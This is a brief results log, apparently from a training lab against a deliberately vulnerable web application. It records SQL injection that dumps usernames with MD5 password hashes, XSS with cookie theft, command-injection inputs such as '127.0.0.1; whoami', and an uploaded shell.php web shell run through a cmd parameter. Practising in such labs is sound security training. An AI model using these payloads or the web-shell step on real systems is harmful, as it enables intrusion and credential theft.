SQL Injection Results:
admin:5f4dcc3b5aa765d61d8327deb882cf99
gordonb:e99a18c428cb38d5f260853678922e03
1337:8d3533d75ae2c3966d7e0d4fcc69216b
pablo:0d107d09f5bbe40cade3de5c71e9e9b7
smithy:5f4dcc3b5aa765d61d8327deb882cf99

XSS Reflected: alert('XSS') worked, cookie stolen
XSS Stored: alert('XSS') worked, but cookie stealer blocked

Command Injection:
127.0.0.1; whoami -> www-data
127.0.0.1; ls -la -> directory listing

File Upload:
shell.php uploaded successfully
http://172.22.0.30/hackable/uploads/shell.php?cmd=whoami -> www-data
